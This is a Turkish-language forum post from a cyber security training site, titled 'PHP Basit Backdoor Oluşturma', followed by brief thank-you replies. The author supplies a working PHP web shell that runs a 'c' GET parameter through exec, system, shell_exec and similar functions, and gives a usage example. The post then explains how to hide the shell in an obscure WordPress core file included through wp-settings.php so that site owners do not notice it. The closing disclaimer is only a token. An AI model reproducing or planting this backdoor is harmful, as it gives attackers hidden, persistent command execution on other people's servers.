Siber Güvenlik Dünyasına Hoşgeldiniz

Ulusal Siber Güvenlik Akademisi olarak sizlere bu alanda siber güvenlik & ethical hacking eğitimi , günümüz siber saldırılarında kullanılan araç ve teknikleri kullanarak, siber güvenlik konusunda sizlere saldırı ve savunma yönünden eğitimler ile sizlerin çözümler üretebileceğiniz bir siber dünya sunuyoruz .
ÜYE OLMAK İÇİN TIKLAYINIZ

Siber Güvenlik Eğitimlerimiz

Siber Güvenlik Eğitimlerimiz İçin Tıklayınız

Siber Güvenlik Dökümanları

Siber Güvenlik Dökümanları İçin Tıklayınız

Bizimle İletişim Kurun

Uzmanlarımız Sorularınızı Cevaplamaya Hazır.

  • Ulusal Siber Güvenlik Akademisi olarak sizlere bu alanda siber güvenlik & ethical hacking eğitimi , günümüz siber saldırılarında kullanılan araç ve teknikleri kullanarak, siber güvenlik konusunda sizlere saldırı ve savunma yönünden eğitimler ile sizlerin çözümler üretebileceğiniz bir siber dünya sunuyoruz .

PHP Basit Backdoor Oluşturma

Serberus

Serberus

KURUCU
Yönetici
MAREŞAL
Katılım
27 May 2018
Mesajlar
222
Tepkime puanı
181
Puanları
43
Uzmanlık Alanı
PHP
HTML


Uzun zamandır güvenlik kategorisine teknik bir yazı yazmıyorduk, bu yazımda basit bir php backdoor oluşturacağız, bunu sistemlere gizlice enjekte edeceğiz ve istediğimiz zaman kullanacağız.

Bu arada bundan sonraki yazılarım için Türkçenin yanında İngilizce de yazmayı düşünüyorum… Nasıl olur sizce?

Backdoor Nedir?

Bir sisteme daha sonradan tekrar yetkili erişim sağlayabilmek için bırakılan dosyalardır, Türkçesi arka kapıdır, güzel gizlendiği zaman çok büyük sorunlara yol açabilir.

Az sonra sizinle güzel ve kullanması basit bi backdoor yazacağız, sonra size bi de bunu gizleme taktikleri vericem, kötü amaçların için kullanmayın ama.

Basit Bir Betik Yazalım

Siz dosya upload, file explorer tarzı bir backdoor da yazabilirsiniz fakat ben en etkili kullanım için komut çalıştırmaya dayalı bir betik yazacağım.

Boyutu ve içeriği olabildiğince kısa tutacağım.

<?php

$x= $_GET[“c”];

if($x){

echo exec($x);

echo shell_exec($x);

echo popen($x);

echo passthru($x);

echo proc_open($x);

echo system($x);

}

?>

c parametresinden gelen içeriği 6 adet fonksiyonla çalıştırdık.Mevzubahis kodların kodların engellenmediği bir sunucuda büyük etkiler bırakabilirsiniz.

Kullanım:

site.com/<dosya>.php?c=<komut>

Örnek: bugresearcher.com/x.php?c=ls

Gizleme Taktiği

Nereye, ne kadar çok yere gizlerseniz sizin faydanıza fakat bu kodları tutup index.php’ye eklerseniz hem kullanım alanınız daralır hem de site sahibi fark edebilir.

WordPress bir siteye eklediğinizi varsayarak anlatacağım, hepsi birbirine benzer özellik gösteriyor zaten.

wp-config.php dosyası sitedeki bütün dosyalarda kullanılıyor bildiğiniz üzere, fakat wp-config.php dosyası da kontrol edileceği için bu dosyaya da eklemeyeceğiz.

wp-config.php’nin kodları içinde,

require_once(ABSPATH . ‘wp-settings.php’);
satırını görebiliriz.

wp-settings.php’nin kodlarına baktığımızda da aşağıdaki satırı görebiliriz,

require( ABSPATH . WPINC . ‘/rest-api/fields/class-wp-rest-**-fields.php’ );
/wp-includes/rest-api/fields/class-wp-rest-**-fields.php dosyası ilgi çekmez, bu yüzden bu dosyaya veya bunun gibi tahmin edilmesi güç bir dosyaya backdoor’umuzun kodlarını ekleyebiliriz.

Sonra da yukarıda anlattığım gibi ?c=<komut> şeklinde kullanacağız.

Umarım yararlı olur, sağlıcakla kalın.
 
N

Nobody

NEFER
NEFER
Katılım
27 May 2018
Mesajlar
6
Tepkime puanı
1
Puanları
1
emeğine sağlık hocam
 
T

tolgademir

NEFER
NEFER
Katılım
19 Kas 2018
Mesajlar
1
Tepkime puanı
0
Puanları
0
Konum
Türkiye
Güzel bir yazı olmuş teşekkürler!
 
Fred.Torvalds

Fred.Torvalds

Well-Known Member
Onursal Ünvan
Katılım
7 Tem 2018
Mesajlar
329
Tepkime puanı
39
Puanları
28
ellerine saglik
 
W

Wingless

NEFER
NEFER
Katılım
3 Mar 2019
Mesajlar
20
Tepkime puanı
0
Puanları
0
Çok sağolasın.
 
Üst